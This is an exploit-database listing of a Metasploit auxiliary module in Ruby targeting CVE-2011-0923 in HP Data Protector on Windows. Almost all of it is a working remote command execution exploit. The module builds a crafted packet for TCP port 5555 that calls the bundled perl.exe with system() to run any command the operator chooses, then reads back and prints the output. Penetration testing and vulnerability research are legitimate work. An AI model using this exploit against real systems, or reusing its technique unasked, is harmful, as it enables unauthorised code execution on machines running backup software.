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HP Data Protector Arbitrary Remote Command Execution

Author
metasploit
Risk
[
Security Risk High
]
0day-ID
0day-ID-21075
Category
remote exploits
Date add
07-08-2013
CVE
CVE-2011-0923
Platform
windows
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'HP Data Protector Arbitrary Remote Command Execution',
      'Description'  => %q{
        This script allows to execute a command with an arbitrary number
        of arguments on Microsoft Windows operating systems. The trick 
        calls a perl.exe interpreter installed with HP Data Protector 
        inside the directory {install_path}/bin/.
        
        The main goal of the script is to bypass the limitation of execute
        only a single command without parameters, as provided by already existing
                                exploits. It is possible to exploit the security issue in order to run 
                                any command inside the target system. 
      },

      'License'  => MSF_LICENSE,
      'Author'        =>
        [
          'Alessandro Di Pinto <alessandro.dipinto () artificialstudios org>',
          'Claudio Moletta <mclaudio () gmail com>',
        ],
      'References'   =>
        [
          [ 'CVE', '2011-0923'],
          [ 'OSVDB', '72526'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143'],
        ],
    ))

    register_options(
      [
        Opt::RPORT(5555),
        OptString.new('CMD', [ true, 'The OS command to execute', 'ipconfig /all'])
      ], self.class)
  end

  def run
    begin
      command = datastore['CMD']
      command = command.gsub("\\","\\\\\\")
      offset = 45
          size_command = (offset + command.length).chr

      crafted_pkt = "\x00\x00\x00"
      crafted_pkt << size_command
      crafted_pkt << "\x32\x00\x01"
      crafted_pkt << "\x01\x01\x01"
      crafted_pkt << "\x01\x01\x00"
      crafted_pkt << "\x01\x00\x01"
      crafted_pkt << "\x00\x01\x00"
      crafted_pkt << "\x01\x01\x00"
      crafted_pkt << "\x2028\x00"
      crafted_pkt << "\\perl.exe"
      crafted_pkt << "\x00 -esystem('#{command}')\x00"

      print_status "Connecting to target '#{rhost}:#{rport}'"
      connect
      print_good "Connected"
        if (datastore['CMD'])
        print_status "Sending payload '#{command}'\n"
        sock.put(crafted_pkt)
        # Clean and parse results
        while true
          response_size = sock.recv(4)
          response_size = response_size.unpack('N')[0]
          break if response_size.nil?
          response = sock.recv(response_size)[5..-1]
          response = response.delete("\x00")
          # Check for the end-of-message
          break if response.include?("RETVAL") 
          print response if not response.empty?
        end
      end
      disconnect

    rescue ::Rex::ConnectionRefused
      print_error "Connection refused '#{rhost}:#{rport}'"
    rescue ::Rex::ConnectionError
      print_error "Connection error '#{rhost}:#{rport}'"
    end
  end

end

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